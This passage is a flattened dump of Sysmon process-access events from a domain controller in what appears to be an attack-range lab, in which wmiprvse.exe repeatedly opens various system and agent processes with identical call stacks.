Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 